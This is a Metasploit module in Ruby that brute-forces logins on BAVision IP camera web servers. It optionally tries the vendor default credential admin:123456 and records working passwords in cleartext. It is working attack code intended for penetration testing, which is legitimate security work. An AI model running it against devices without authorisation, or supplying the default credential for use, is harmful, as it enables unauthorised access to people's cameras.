GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/bavision_cameras'
require 'metasploit/framework/credential_collection'
# Auxiliary login scanner for the web service of BAVision IP cameras.
#
# For each host it builds a BavisionCameras login scanner, checks that the
# target looks like the expected web server, then tries each credential in
# the collection and records every outcome through the reporting helpers.
#
# NOTE(review): successful logins are handed to create_credential together
# with the cleartext password (private_type: :password), so whatever store
# backs the current workspace ends up holding working device credentials
# and should be protected accordingly -- confirm the storage backend.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and the TRYDEFAULT option.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BAVision IP Camera Web Server Login',
        'Description' => %q{
          This module will attempt to authenticate to an IP camera created by BAVision via the
          web service. By default, the vendor ships a default credential admin:123456 to its
          cameras, and the web server does not enforce lockouts in case of a bruteforce attack.
        },
        'Author' => [ 'sinn3r' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Optional and off by default: the vendor default pair is only queued on request.
    default_cred_option = OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])
    register_options([default_cred_option])
  end

  # Returns the login scanner for this module instance, building it on first use.
  #
  # NOTE(review): the scanner is cached in @scanner without regard to +ip+, so a
  # later call with a different address on the same instance returns the scanner
  # built for the first one. This presumably relies on the framework running each
  # host in its own module instance -- confirm against the Scanner mixin.
  #
  # @param ip [String] target address passed to the scanner as its host
  # @return [Metasploit::Framework::LoginScanner::BavisionCameras]
  def scanner(ip)
    return @scanner if @scanner

    creds = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    if datastore['TRYDEFAULT']
      # The default username and password are added as separate entries,
      # not as a single paired credential.
      print_status("Default credential admin:123456 added to the credential queue for testing.")
      creds.add_public('admin')
      creds.add_private('123456')
    end

    scanner_options = configure_http_login_scanner(
      host: ip,
      port: datastore['RPORT'],
      cred_details: creds,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 5,
      http_username: datastore['HttpUsername'],
      http_password: datastore['HttpPassword']
    )

    @scanner = Metasploit::Framework::LoginScanner::BavisionCameras.new(scanner_options)
  end

  # Records a working credential and the login attempt that proved it.
  #
  # @param ip [String] address of the service that accepted the login
  # @param port [Integer] port of that service
  # @param result [Object] scan result; its credential, status and proof are read
  # @return [Object] whatever create_credential_login returns
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The credential core is created first because the login record refers to it.
    core = create_credential(
      module_fullname: fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
      **service_data
    )

    create_credential_login(
      core: core,
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof,
      **service_data
    )
  end

  # Passes a failed attempt to invalidate_login with the tried credential and the
  # status and proof the scanner returned for it.
  #
  # @param ip [String] address of the service that was tried
  # @param rport [Integer] port of that service
  # @param result [Object] scan result; its credential, status and proof are read
  # @return [Object] whatever invalidate_login returns
  def report_bad_cred(ip, rport, result)
    tried = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: tried.public,
      private: tried.private,
      realm_key: tried.realm_key,
      realm_value: tried.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the credential scan against one host and reports each result.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; a result with
  # any other status is neither printed nor recorded.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    statuses = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      case result.status
      when statuses::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
        report_good_cred(ip, rport, result)
      when statuses::UNABLE_TO_CONNECT
        # A connection failure is recorded through the same path as a wrong password.
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      when statuses::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Per-host entry point: skips the host unless the scanner's setup check passes,
  # then starts the credential scan.
  #
  # @param ip [String] target address
  # @return [Object, nil] the result of #bruteforce, or nil when the check fails
  def run_host(ip)
    if scanner(ip).check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Target is not BAVision IP camera web server.')
      nil
    end
  end
end